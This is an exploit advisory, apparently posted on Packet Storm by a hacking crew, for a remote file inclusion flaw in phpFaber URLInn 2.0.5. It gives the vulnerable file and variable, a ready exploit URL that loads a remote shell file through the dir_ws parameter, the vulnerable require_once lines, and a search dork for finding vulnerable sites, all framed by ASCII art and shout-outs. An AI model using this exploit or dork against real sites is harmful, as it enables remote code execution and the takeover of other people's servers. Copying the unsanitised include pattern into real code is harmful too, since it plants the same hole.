phpFaber URLInn version 2.0.5 is susceptible to a remote file inclusion vulnerability.
aa3ec3909a003ef50aefc9885845f05e / \
_ ) (( )) (
(@) /|\ ))_(( /|\
|-| / | \ (/\|/\) / | \ (@)
| |--------------------/--|-voV---\`|'/--Vov-|--\---------------------|-|
|-| '^` (o o) '^` | |
| | `\Y/' |-|
|-| | |
| | -=ShAd0w-CrEw=- |-|
|-| | |
| | |-|
|_|___________________________________________________________________| |
(@) l /\ / ( ( \ /\ l |-|
l / V \ \ V \ l (@)
l/ _) )_ \I
`\ /'
`
----------------------------------------------
GrEeTs To -=sHaDoW sEcUrItY TeAm=- GrEeTs To
----------------------------------------------
A2J, iNs, The Pitbull, ICQBomber, str0ke
----------------------------------------------
BiG sHoUt OuT tO udplink.net
----------------------------------------------
Vulnerability Type: Remote File Inclusion
Vulnerable file: /phpFaber.URLInn.v2.0.5.PHP.NULL-DGT/phpfaber_urlinn_2_0_5/urlinn_includes/config.php
Exploit URL: http://localhost/path/urlinn_includes/config.php?dir_ws=http://localhost/shell.txt?
Method: get
Register_globals: On
Vulnerable variable: dir_ws
Line number: 78
Lines:
----------------------------------------------
require_once("$dir_ws/urlinn_includes/adodb/adodb.inc.php");
require_once("$dir_ws/urlinn_includes/smarty/Smarty.class.php");
require_once("$dir_ws/urlinn_includes/i_PageSelector.php");
----------------------------------------------
----------------------------------------------
FoUnD By BiNgZa AKA RaZor
----------------------------------------------
DoRk:Powered by phpFaber URLInn. Copyright © 2004-2006 phpFaber
----------------------------------------------
shadowcrew@hotmail.co.uk
----------------------------------------------
shadow.php0h.com
----------------------------------------------
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!